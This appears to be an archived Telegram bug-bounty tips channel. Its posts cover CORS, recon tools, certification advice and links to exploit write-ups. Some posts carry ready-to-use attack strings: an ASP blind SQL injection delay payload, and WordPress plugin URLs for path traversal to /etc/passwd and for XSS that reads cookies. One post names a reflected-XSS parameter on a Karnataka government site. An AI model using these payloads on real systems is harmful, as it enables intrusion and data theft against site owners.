Bug bounty Tips

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist
Admin: @laazy_hack3r

5 846 subscribers
Posts archive
🚨 Ever wonder why your API calls are getting blocked? Cross-Origin Resource Sharing (CORS) can be the culprit! When your JavaScript tries to communicate with an API on a different domain, the browser steps in to protect you. CORS ensures that only approved domains can make those requests. Learn how to manage these "preflight" checks and configure your server correctly to allow legitimate cross-origin requests. Hit save to stay in the know and never let CORS block your code! 🔒 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech https://www.instagram.com/p/C_fObBqShyT/?igsh=dWloN2lpeGx0ZHU0

Mindmap for tryhackme

What should I do???
Anonymous voting

Some of the DNS tools...

https://cyfare.net/ - ExploitDB - Exploits, Shellcodes, Dorks - Malware Query Engine - Download, Search, Hunt & Intel - Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox

Tricky ASP blind SQL Injection in a login page. Payload👇 ';%20waitfor%20delay%20'0:0:6'%20--%20

Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html

⚡️ WordPress endpoints to look at - check this if you have these plugins. ⚡️
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd

What are the basic goals of good reconnaissance

Deobfuscation and analysis of client-side JavaScript code to detect DOM-based XSS.

Analysis of CVE-2024-43044 — From file read to RCE in Jenkins through agents https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

Join the discussion group guys https://t.me/bug_hunting_talks

Exploring the dark and deep web.pdf (1.64 MB)

see it really works easy 5 min finding

Today I got an interesting reflected XSS in the Karnataka gov website /kn, where the lang_name param is vulnerable

☄️AutoRecon- It is a multi-threaded network reconnaissance tool which performs automated enumeration of services. 🔗https://github.com/Tib3rius/AutoRecon

Thanks, guys, for this suggestion. I was stuck, but seeing the money and the content provided by Hack The Box Academy, I am planning to first take the CPT as it covers almost all the topics, and also so many people say that the exam is tougher than OSCP. So after reading all those articles and Reddit suggestions and YouTube reviews, I am planning to first complete the CPT; once done, later I will take the OSCP. And I also suggest this to you guys, only if you are a beginner or an intermediate: first take the alternative courses to OSCP, and once you get things done, you will get confident and later you can pass the OSCP in one time. Because it costs a lot........ 🤑💰

Actually I am using a foreign number, so not to worry if it's banned in India.

Later on I will make a group